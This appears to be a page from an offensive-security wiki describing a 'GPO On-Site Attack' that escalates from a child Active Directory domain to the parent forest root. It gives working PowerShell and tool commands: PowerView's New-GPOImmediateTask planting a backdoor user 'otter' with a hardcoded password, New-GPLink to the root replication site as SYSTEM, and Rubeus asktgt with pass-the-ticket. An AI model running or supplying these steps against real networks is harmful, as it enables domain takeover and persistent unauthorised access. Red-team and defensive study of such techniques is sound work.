GPO On-Site Attack

This technique can be used to move from the child domain to the parent one. The steps are the following:

Create a malicious GPO on the Child DC.
Query the Root Domain to identify the replication site of the Root Domain.
Link the created GPO to the Default Replication Site of the Root DC as SYSTEM
Upon completion of replication, confirm the presence of the created GPO within the Root DC.

We'll start by creating a GPO

$gpo = "Something"
New-GPO $gpo

With that set up we'll create a scheduled task inside that GPO that will add a new user

Import-Module .\PowerView_2.ps1
New-GPOImmediateTask -Verbose -Force -TaskName 'Something' -GPODisplayName "Something" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user otter SomethingSecure123! /add"

We can verify if the task has been added as we also have to make sure to set the Run a new instance in parallel option

After this, it's time to link the GPO to the Default Replication Site of the Root DC: to this we first have to retrieve the site

Get-ADDomainController -Server domain.com | Select ServerObjectDN

and then link the GPO to it with a SYSTEM shell

$sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=DOMAIN,DC=COM"
New-GPLink -Name "Something" -Target $sitePath -Server dev.domain.com

Now we can wait for the task to run and request a TGT for the backdoored user on the parent DC.

The target might need to be reset after the scheduled task ran.

.\Rubeus.exe asktgt /user:otter /password:'SomethingSecure123!' /domain:domain.com /ptt

PreviousADCS NC Replication Attack NextGoldenGMSA Attack

Last updated 1 year ago